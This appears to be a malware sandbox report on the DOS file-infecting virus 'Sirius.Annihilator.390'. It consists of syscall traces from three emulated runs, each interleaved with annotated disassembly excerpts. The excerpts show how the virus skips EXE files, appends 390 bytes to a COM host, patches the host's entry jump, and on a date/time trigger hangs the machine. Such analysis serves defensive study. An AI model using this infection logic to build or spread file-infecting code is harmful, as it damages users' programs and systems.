Sample viewer

vx.netlux.org/Virus.DOS.Sirius.Annihilator.390


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:30:56.890951164Z 26 PC: 14113 | Set disk transfer address
2018-12-17T22:30:56.892308019Z 78 PC: 14127 | Find first file
2018-12-17T22:30:56.900449231Z 61 PC: 14134 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:30:56.908185916Z 66 PC: 14206 | Move file pointer
2018-12-17T22:30:56.910051703Z 62 PC: 1415b | Close file
2018-12-17T22:30:56.91307001Z 79 PC: 14127 | Find next file
2018-12-17T22:30:56.916533839Z 61 PC: 14134 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:30:56.924468395Z 66 PC: 14206 | Move file pointer
2018-12-17T22:30:56.927069692Z 62 PC: 1415b | Close file
2018-12-17T22:30:56.929574928Z 79 PC: 14127 | Find next file
2018-12-17T22:30:56.932962103Z 61 PC: 14134 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:30:56.949227971Z 66 PC: 14206 | Move file pointer
2018-12-17T22:30:56.951180423Z 62 PC: 1415b | Close file
2018-12-17T22:30:56.95359965Z 79 PC: 14127 | Find next file
2018-12-17T22:30:56.958043421Z 61 PC: 14134 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:30:56.965704981Z 66 PC: 14206 | Move file pointer
2018-12-17T22:30:56.967674709Z 62 PC: 1415b | Close file
2018-12-17T22:30:56.970018494Z 79 PC: 14127 | Find next file
2018-12-17T22:30:56.974924573Z 61 PC: 14134 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:30:56.982494449Z 66 PC: 14206 | Move file pointer
2018-12-17T22:30:56.98471845Z 62 PC: 1415b | Close file
2018-12-17T22:30:56.988211379Z 79 PC: 14127 | Find next file
2018-12-17T22:30:56.991234618Z 61 PC: 14134 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:30:56.999090886Z 66 PC: 14206 | Move file pointer
2018-12-17T22:30:57.002373267Z 62 PC: 1415b | Close file
2018-12-17T22:30:57.004834648Z 79 PC: 14127 | Find next file
2018-12-17T22:30:57.008026815Z 61 PC: 14134 | Open file (Filename = 'PAH.COM')
2018-12-17T22:30:57.01684824Z 66 PC: 14206 | Move file pointer
2018-12-17T22:30:57.018900669Z 62 PC: 1415b | Close file
2018-12-17T22:30:57.021279871Z 79 PC: 14127 | Find next file
2018-12-17T22:30:57.02443445Z 61 PC: 14134 | Open file (Filename = 'TEST.COM')
2018-12-17T22:30:57.032123348Z 66 PC: 14206 | Move file pointer
2018-12-17T22:30:57.039896537Z 87 PC: 1414b | Get or set file date and time
2018-12-17T22:30:57.045742399Z 44 PC: 1416b | Get time 0x1416b: or dx, dx
; Disassembly window from the sandbox trace: candidate-file check and infection set-up.
; The window opens at 0x1416b (`or dx, dx`, printed on the preceding trace line, right
; after the logged "Get time" call) and ends before the instruction that uses SI/DI/CX.
0x1416d: je 0x14167                          ; DX == 0 after Get time -> branch back to 0x14167 (target not shown)
0x1416f: mov word ptr [bp + 0x289], dx       ; keep the non-zero DX (DOS Get time: DH=seconds, DL=hundredths); later use not visible here
0x14173: mov ax, 0x4200                      ; AH=42h, AL=00h: move file pointer relative to start of file
0x14176: call 0x14200                        ; helper zeroes CX:DX and issues int 21h -> pointer at offset 0
0x14179: mov ah, 0x3f                        ; AH=3Fh: read from file handle
0x1417b: lea dx, word ptr [bp + 0x22b]       ; DX = 3-byte buffer at bp+0x22b
0x1417f: mov cx, 3                           ; read the first 3 bytes of the opened file
0x14182: int 0x21
0x14184: cmp byte ptr [bp + 0x22b], 0x4d     ; first byte 'M' (EXE header "MZ")?
0x14189: je 0x14157                          ; yes -> leave this file alone (0x14157 not shown; presumably the close path, confirm)
0x1418b: cmp byte ptr [bp + 0x22b], 0x5a     ; first byte 'Z' (alternate EXE signature "ZM")?
0x14190: je 0x14157                          ; same skip path
0x14192: mov ax, 0x4202                      ; AH=42h, AL=02h: move file pointer relative to end of file
0x14195: call 0x14200                        ; offset 0 from the end -> DOS returns the file size in DX:AX
0x14198: sub ax, 3                           ; size - 3; consistent with a near-jump displacement from offset 0 to the old end of file (TODO confirm)
0x1419b: mov word ptr cs:[bp + 0x229], ax    ; stored at bp+0x229 for later use
0x141a0: lea si, word ptr [bp + 0x106]       ; SI = bp+0x106
0x141a4: mov di, 0xfb90                      ; DI = 0xFB90
0x141a7: mov cx, 0x186                       ; CX = 0x186 = 390, the length of the 390-byte write the trace logs afterwards
2018-12-17T22:30:57.049727703Z 66 PC: 14206 | Move file pointer
2018-12-17T22:30:57.051344253Z 63 PC: 14184 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:30:57.054243844Z 66 PC: 14206 | Move file pointer
2018-12-17T22:30:57.057203858Z 64 PC: 141bd | Write file or device (Write 390 bytes on handle 5)
2018-12-17T22:30:57.060780818Z 66 PC: 14206 | Move file pointer
2018-12-17T22:30:57.062403621Z 64 PC: 141ce | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:30:57.066387467Z 87 PC: 141d5 | Get or set file date and time
2018-12-17T22:30:57.068805356Z 62 PC: 141d9 | Close file
2018-12-17T22:30:57.098346495Z 42 PC: 141dd | Get date 0x141dd: cmp dh, dl
; Disassembly window from the sandbox trace: date/time-gated payload check, then return to the host.
; The window opens at 0x141dd (`cmp dh, dl`, printed on the preceding trace line) right after
; the logged "Get date" call; DOS Get date returns DH=month, DL=day.
0x141df: jne 0x141f4                         ; month != day -> skip the payload
0x141e1: mov ah, 0x2c                        ; AH=2Ch: get system time
0x141e3: int 0x21
0x141e5: and dh, 7                           ; DH=seconds; keep the low three bits
0x141e8: jne 0x141f4                         ; seconds not a multiple of 8 -> skip the payload
0x141ea: mov ah, 9                           ; AH=09h: print '$'-terminated string
0x141ec: lea dx, word ptr [bp + 0x234]       ; message at bp+0x234 (text not shown in this window)
0x141f0: int 0x21
0x141f2: cli                                 ; payload: disable maskable interrupts...
0x141f3: hlt                                 ; ...and halt, so the machine stays hung
0x141f4: mov ah, 0x1a                        ; AH=1Ah: set disk transfer address
0x141f6: mov dx, 0x80                        ; DX = 0x80, the default DTA offset in the PSP
0x141f9: int 0x21
0x141fb: mov ax, 0x100                       ; 0x100 = entry offset of a COM image
0x141fe: push ax
0x141ff: ret                                 ; near return to 0x100: control passes to the host program
0x14200: xor cx, cx                          ; helper reached via `call 0x14200` with AX=42xxh: CX = 0
0x14202: xor dx, dx                          ; DX = 0 -> file offset CX:DX = 0
0x14204: int 0x21                            ; issue the DOS call; the window ends before the helper returns
2018-12-17T22:30:57.101171187Z 26 PC: 141fb | Set disk transfer address
2018-12-17T22:30:57.103086256Z 48 PC: 12a63 | Get DOS version
2018-12-17T22:30:57.104417578Z 9 PC: 12a7a | Display string (String= ' --=[ Selfchecking AntiStealth Goat COM/EXE file, 01/06/01 ]=------------------ (c) 1995-2001 by ROSE SWE, Dipl.-Ing. Ralph Roth - Version 1.18 - Freeware ')
2018-12-17T22:30:57.131587537Z 61 PC: 12cb7 | Open file (Filename = '')
2018-12-17T22:30:57.140280498Z 9 PC: 12a88 | Display string (String= 'Self test: ')
2018-12-17T22:30:57.142967936Z 93 PC: 12b24 | File sharing functions
2018-12-17T22:30:57.14525067Z 9 PC: 12b03 | Display string (String= 'Size change=+030Ch/00780d. Virus might be activ? ')
2018-12-17T22:30:57.152034103Z 76 PC: 12b09 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5533,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:54:43.736774913Z 26 PC: 14113 | Set disk transfer address
2018-12-25T11:54:43.738504022Z 78 PC: 14127 | Find first file
2018-12-25T11:54:43.745407262Z 61 PC: 14134 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:54:43.752585373Z 66 PC: 14206 | Move file pointer
2018-12-25T11:54:43.75482896Z 62 PC: 1415b | Close file
2018-12-25T11:54:43.756480446Z 79 PC: 14127 | Find next file (See above)
2018-12-25T11:54:43.758788493Z 61 PC: 14134 | Open file (See above)
2018-12-25T11:54:43.770798671Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:43.772285047Z 62 PC: 1415b | Close file (See above)
2018-12-25T11:54:43.773885872Z 79 PC: 14127 | Find next file (See above)
2018-12-25T11:54:43.777165641Z 61 PC: 14134 | Open file (See above)
2018-12-25T11:54:43.783433418Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:43.784685787Z 62 PC: 1415b | Close file (See above)
2018-12-25T11:54:43.786509954Z 79 PC: 14127 | Find next file (See above)
2018-12-25T11:54:43.789322297Z 61 PC: 14134 | Open file (See above)
2018-12-25T11:54:43.79556933Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:43.796820383Z 62 PC: 1415b | Close file (See above)
2018-12-25T11:54:43.79918175Z 79 PC: 14127 | Find next file (See above)
2018-12-25T11:54:43.801637441Z 61 PC: 14134 | Open file (See above)
2018-12-25T11:54:43.809315117Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:43.811423452Z 62 PC: 1415b | Close file (See above)
2018-12-25T11:54:43.813057908Z 79 PC: 14127 | Find next file (See above)
2018-12-25T11:54:43.815357737Z 61 PC: 14134 | Open file (See above)
2018-12-25T11:54:43.82283416Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:43.824257661Z 62 PC: 1415b | Close file (See above)
2018-12-25T11:54:43.825930141Z 79 PC: 14127 | Find next file (See above)
2018-12-25T11:54:43.829586301Z 61 PC: 14134 | Open file (See above)
2018-12-25T11:54:43.8359175Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:43.83721246Z 62 PC: 1415b | Close file (See above)
2018-12-25T11:54:43.839397013Z 79 PC: 14127 | Find next file (See above)
2018-12-25T11:54:43.842429854Z 61 PC: 14134 | Open file (See above)
2018-12-25T11:54:43.848702294Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:43.850478631Z 87 PC: 1414b | Get or set file date and time
2018-12-25T11:54:43.854849383Z 44 PC: 1416b | Get time 0x1416b: or dx, dx
; Disassembly window from the sandbox trace: candidate-file check and infection set-up.
; The window opens at 0x1416b (`or dx, dx`, printed on the preceding trace line, right
; after the logged "Get time" call) and ends before the instruction that uses SI/DI/CX.
0x1416d: je 0x14167                          ; DX == 0 after Get time -> branch back to 0x14167 (target not shown)
0x1416f: mov word ptr [bp + 0x289], dx       ; keep the non-zero DX (DOS Get time: DH=seconds, DL=hundredths); later use not visible here
0x14173: mov ax, 0x4200                      ; AH=42h, AL=00h: move file pointer relative to start of file
0x14176: call 0x14200                        ; helper zeroes CX:DX and issues int 21h -> pointer at offset 0
0x14179: mov ah, 0x3f                        ; AH=3Fh: read from file handle
0x1417b: lea dx, word ptr [bp + 0x22b]       ; DX = 3-byte buffer at bp+0x22b
0x1417f: mov cx, 3                           ; read the first 3 bytes of the opened file
0x14182: int 0x21
0x14184: cmp byte ptr [bp + 0x22b], 0x4d     ; first byte 'M' (EXE header "MZ")?
0x14189: je 0x14157                          ; yes -> leave this file alone (0x14157 not shown; presumably the close path, confirm)
0x1418b: cmp byte ptr [bp + 0x22b], 0x5a     ; first byte 'Z' (alternate EXE signature "ZM")?
0x14190: je 0x14157                          ; same skip path
0x14192: mov ax, 0x4202                      ; AH=42h, AL=02h: move file pointer relative to end of file
0x14195: call 0x14200                        ; offset 0 from the end -> DOS returns the file size in DX:AX
0x14198: sub ax, 3                           ; size - 3; consistent with a near-jump displacement from offset 0 to the old end of file (TODO confirm)
0x1419b: mov word ptr cs:[bp + 0x229], ax    ; stored at bp+0x229 for later use
0x141a0: lea si, word ptr [bp + 0x106]       ; SI = bp+0x106
0x141a4: mov di, 0xfb90                      ; DI = 0xFB90
0x141a7: mov cx, 0x186                       ; CX = 0x186 = 390, the length of the 390-byte write the trace logs afterwards
2018-12-25T11:54:43.856921203Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:43.85836253Z 63 PC: 14184 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:54:43.864730819Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:43.866040259Z 64 PC: 141bd | Write file or device (Write 390 bytes on handle 5)
2018-12-25T11:54:43.873459952Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:43.875321223Z 64 PC: 141ce | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:54:43.878286249Z 87 PC: 141d5 | Get or set file date and time
2018-12-25T11:54:43.887750509Z 62 PC: 141d9 | Close file
2018-12-25T11:54:43.900810979Z 42 PC: 141dd | Get date 0x141dd: cmp dh, dl
; Disassembly window from the sandbox trace: date/time-gated payload check, then return to the host.
; The window opens at 0x141dd (`cmp dh, dl`, printed on the preceding trace line) right after
; the logged "Get date" call; DOS Get date returns DH=month, DL=day.
0x141df: jne 0x141f4                         ; month != day -> skip the payload
0x141e1: mov ah, 0x2c                        ; AH=2Ch: get system time
0x141e3: int 0x21
0x141e5: and dh, 7                           ; DH=seconds; keep the low three bits
0x141e8: jne 0x141f4                         ; seconds not a multiple of 8 -> skip the payload
0x141ea: mov ah, 9                           ; AH=09h: print '$'-terminated string
0x141ec: lea dx, word ptr [bp + 0x234]       ; message at bp+0x234 (text not shown in this window)
0x141f0: int 0x21
0x141f2: cli                                 ; payload: disable maskable interrupts...
0x141f3: hlt                                 ; ...and halt, so the machine stays hung
0x141f4: mov ah, 0x1a                        ; AH=1Ah: set disk transfer address
0x141f6: mov dx, 0x80                        ; DX = 0x80, the default DTA offset in the PSP
0x141f9: int 0x21
0x141fb: mov ax, 0x100                       ; 0x100 = entry offset of a COM image
0x141fe: push ax
0x141ff: ret                                 ; near return to 0x100: control passes to the host program
0x14200: xor cx, cx                          ; helper reached via `call 0x14200` with AX=42xxh: CX = 0
0x14202: xor dx, dx                          ; DX = 0 -> file offset CX:DX = 0
0x14204: int 0x21                            ; issue the DOS call; the window ends before the helper returns
2018-12-25T11:54:43.903123593Z 44 PC: 141e5 | Get time 0x141e5: and dh, 7
; Disassembly window from the sandbox trace, taken at the "Get time" call logged at PC 0x141e5.
; That call sits behind the month == day branch, so this run passed the date check.
; The window opens at 0x141e5 (`and dh, 7`, printed on the preceding trace line), which masks
; the seconds value returned in DH.
0x141e8: jne 0x141f4                         ; seconds not a multiple of 8 -> skip the payload
0x141ea: mov ah, 9                           ; AH=09h: print '$'-terminated string
0x141ec: lea dx, word ptr [bp + 0x234]       ; message at bp+0x234 (text not shown in this window)
0x141f0: int 0x21
0x141f2: cli                                 ; payload: disable maskable interrupts...
0x141f3: hlt                                 ; ...and halt, so the machine stays hung
0x141f4: mov ah, 0x1a                        ; AH=1Ah: set disk transfer address
0x141f6: mov dx, 0x80                        ; DX = 0x80, the default DTA offset in the PSP
0x141f9: int 0x21
0x141fb: mov ax, 0x100                       ; 0x100 = entry offset of a COM image
0x141fe: push ax
0x141ff: ret                                 ; near return to 0x100: control passes to the host program
0x14200: xor cx, cx                          ; seek helper (called with AX=42xxh): CX = 0
0x14202: xor dx, dx                          ; DX = 0 -> file offset CX:DX = 0
0x14204: int 0x21                            ; issue the DOS call
0x14206: ret                                 ; helper returns with the DOS result in DX:AX
; NOTE(review): everything from 0x14207 on follows an unconditional ret and is probably
; data decoded as instructions, not executed code; confirm against the raw bytes.
0x14207: jmp 0x15a32                         ; 3-byte near-jmp encoding; possibly a stored jump (unverified)
0x1420a: jmp 0x158af                         ; another 3-byte near-jmp encoding; possibly saved host bytes (unverified)
0x1420d: sub ch, byte ptr [0x6f63]           ; encodes as 2A 2E 63 6F = ASCII "*.co"; presumably the start of a "*.COM" search mask
2018-12-25T11:54:43.905752147Z 26 PC: 141fb | Set disk transfer address
2018-12-25T11:54:43.907246523Z 48 PC: 12a63 | Get DOS version
2018-12-25T11:54:43.908341104Z 9 PC: 12a7a | Display string (String= ' --=[ Selfchecking AntiStealth Goat COM/EXE file, 01/06/01 ]=------------------ (c) 1995-2001 by ROSE SWE, Dipl.-Ing. Ralph Roth - Version 1.18 - Freeware ')
2018-12-25T11:54:43.91776034Z 61 PC: 12cb7 | Open file (Filename = '')
2018-12-25T11:54:43.92532267Z 9 PC: 12a88 | Display string (String= 'Self test: ')
2018-12-25T11:54:43.928861346Z 93 PC: 12b24 | File sharing functions
2018-12-25T11:54:43.931001013Z 9 PC: 12b03 | Display string (String= 'Size change=+030Ch/00780d. Virus might be activ? ')
2018-12-25T11:54:43.935770187Z 76 PC: 12b09 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5533,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:54:44.466326657Z 26 PC: 14113 | Set disk transfer address
2018-12-25T11:54:44.467989285Z 78 PC: 14127 | Find first file
2018-12-25T11:54:44.47427019Z 61 PC: 14134 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:54:44.481235022Z 66 PC: 14206 | Move file pointer
2018-12-25T11:54:44.486491741Z 62 PC: 1415b | Close file
2018-12-25T11:54:44.488268097Z 79 PC: 14127 | Find next file (See above)
2018-12-25T11:54:44.490729981Z 61 PC: 14134 | Open file (See above)
2018-12-25T11:54:44.498445274Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:44.5054159Z 62 PC: 1415b | Close file (See above)
2018-12-25T11:54:44.50688225Z 79 PC: 14127 | Find next file (See above)
2018-12-25T11:54:44.508862138Z 61 PC: 14134 | Open file (See above)
2018-12-25T11:54:44.51486331Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:44.516372735Z 62 PC: 1415b | Close file (See above)
2018-12-25T11:54:44.518019283Z 79 PC: 14127 | Find next file (See above)
2018-12-25T11:54:44.522212923Z 61 PC: 14134 | Open file (See above)
2018-12-25T11:54:44.528593159Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:44.543293683Z 62 PC: 1415b | Close file (See above)
2018-12-25T11:54:44.546006482Z 79 PC: 14127 | Find next file (See above)
2018-12-25T11:54:44.550218125Z 61 PC: 14134 | Open file (See above)
2018-12-25T11:54:44.556973532Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:44.558571459Z 62 PC: 1415b | Close file (See above)
2018-12-25T11:54:44.560047746Z 79 PC: 14127 | Find next file (See above)
2018-12-25T11:54:44.567064562Z 61 PC: 14134 | Open file (See above)
2018-12-25T11:54:44.591410542Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:44.593225833Z 62 PC: 1415b | Close file (See above)
2018-12-25T11:54:44.596230006Z 79 PC: 14127 | Find next file (See above)
2018-12-25T11:54:44.59953428Z 61 PC: 14134 | Open file (See above)
2018-12-25T11:54:44.604026718Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:44.605220465Z 62 PC: 1415b | Close file (See above)
2018-12-25T11:54:44.610816459Z 79 PC: 14127 | Find next file (See above)
2018-12-25T11:54:44.613358359Z 61 PC: 14134 | Open file (See above)
2018-12-25T11:54:44.618025525Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:44.619991332Z 87 PC: 1414b | Get or set file date and time
2018-12-25T11:54:44.623049011Z 44 PC: 1416b | Get time 0x1416b: or dx, dx
; Disassembly window from the sandbox trace: candidate-file check and infection set-up.
; The window opens at 0x1416b (`or dx, dx`, printed on the preceding trace line, right
; after the logged "Get time" call) and ends before the instruction that uses SI/DI/CX.
0x1416d: je 0x14167                          ; DX == 0 after Get time -> branch back to 0x14167 (target not shown)
0x1416f: mov word ptr [bp + 0x289], dx       ; keep the non-zero DX (DOS Get time: DH=seconds, DL=hundredths); later use not visible here
0x14173: mov ax, 0x4200                      ; AH=42h, AL=00h: move file pointer relative to start of file
0x14176: call 0x14200                        ; helper zeroes CX:DX and issues int 21h -> pointer at offset 0
0x14179: mov ah, 0x3f                        ; AH=3Fh: read from file handle
0x1417b: lea dx, word ptr [bp + 0x22b]       ; DX = 3-byte buffer at bp+0x22b
0x1417f: mov cx, 3                           ; read the first 3 bytes of the opened file
0x14182: int 0x21
0x14184: cmp byte ptr [bp + 0x22b], 0x4d     ; first byte 'M' (EXE header "MZ")?
0x14189: je 0x14157                          ; yes -> leave this file alone (0x14157 not shown; presumably the close path, confirm)
0x1418b: cmp byte ptr [bp + 0x22b], 0x5a     ; first byte 'Z' (alternate EXE signature "ZM")?
0x14190: je 0x14157                          ; same skip path
0x14192: mov ax, 0x4202                      ; AH=42h, AL=02h: move file pointer relative to end of file
0x14195: call 0x14200                        ; offset 0 from the end -> DOS returns the file size in DX:AX
0x14198: sub ax, 3                           ; size - 3; consistent with a near-jump displacement from offset 0 to the old end of file (TODO confirm)
0x1419b: mov word ptr cs:[bp + 0x229], ax    ; stored at bp+0x229 for later use
0x141a0: lea si, word ptr [bp + 0x106]       ; SI = bp+0x106
0x141a4: mov di, 0xfb90                      ; DI = 0xFB90
0x141a7: mov cx, 0x186                       ; CX = 0x186 = 390, the length of the 390-byte write the trace logs afterwards
2018-12-25T11:54:44.625555985Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:44.62814004Z 63 PC: 14184 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:54:44.630270262Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:44.63137573Z 64 PC: 141bd | Write file or device (Write 390 bytes on handle 5)
2018-12-25T11:54:44.633971868Z 66 PC: 14206 | Move file pointer (See above)
2018-12-25T11:54:44.635658314Z 64 PC: 141ce | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:54:44.638814024Z 87 PC: 141d5 | Get or set file date and time
2018-12-25T11:54:44.641944086Z 62 PC: 141d9 | Close file
2018-12-25T11:54:44.655922802Z 42 PC: 141dd | Get date 0x141dd: cmp dh, dl
; Disassembly window from the sandbox trace: date/time-gated payload check, then return to the host.
; The window opens at 0x141dd (`cmp dh, dl`, printed on the preceding trace line) right after
; the logged "Get date" call; DOS Get date returns DH=month, DL=day.
0x141df: jne 0x141f4                         ; month != day -> skip the payload
0x141e1: mov ah, 0x2c                        ; AH=2Ch: get system time
0x141e3: int 0x21
0x141e5: and dh, 7                           ; DH=seconds; keep the low three bits
0x141e8: jne 0x141f4                         ; seconds not a multiple of 8 -> skip the payload
0x141ea: mov ah, 9                           ; AH=09h: print '$'-terminated string
0x141ec: lea dx, word ptr [bp + 0x234]       ; message at bp+0x234 (text not shown in this window)
0x141f0: int 0x21
0x141f2: cli                                 ; payload: disable maskable interrupts...
0x141f3: hlt                                 ; ...and halt, so the machine stays hung
0x141f4: mov ah, 0x1a                        ; AH=1Ah: set disk transfer address
0x141f6: mov dx, 0x80                        ; DX = 0x80, the default DTA offset in the PSP
0x141f9: int 0x21
0x141fb: mov ax, 0x100                       ; 0x100 = entry offset of a COM image
0x141fe: push ax
0x141ff: ret                                 ; near return to 0x100: control passes to the host program
0x14200: xor cx, cx                          ; helper reached via `call 0x14200` with AX=42xxh: CX = 0
0x14202: xor dx, dx                          ; DX = 0 -> file offset CX:DX = 0
0x14204: int 0x21                            ; issue the DOS call; the window ends before the helper returns
2018-12-25T11:54:44.668457073Z 26 PC: 141fb | Set disk transfer address
2018-12-25T11:54:44.670508522Z 48 PC: 12a63 | Get DOS version
2018-12-25T11:54:44.675895578Z 9 PC: 12a7a | Display string (String= ' --=[ Selfchecking AntiStealth Goat COM/EXE file, 01/06/01 ]=------------------ (c) 1995-2001 by ROSE SWE, Dipl.-Ing. Ralph Roth - Version 1.18 - Freeware ')
2018-12-25T11:54:44.685717372Z 61 PC: 12cb7 | Open file (Filename = '')
2018-12-25T11:54:44.69270643Z 9 PC: 12a88 | Display string (String= 'Self test: ')
2018-12-25T11:54:44.696878578Z 93 PC: 12b24 | File sharing functions
2018-12-25T11:54:44.699035557Z 9 PC: 12b03 | Display string (String= 'Size change=+030Ch/00780d. Virus might be activ? ')
2018-12-25T11:54:44.703250884Z 76 PC: 12b09 | Terminate with return code (Return code = '1')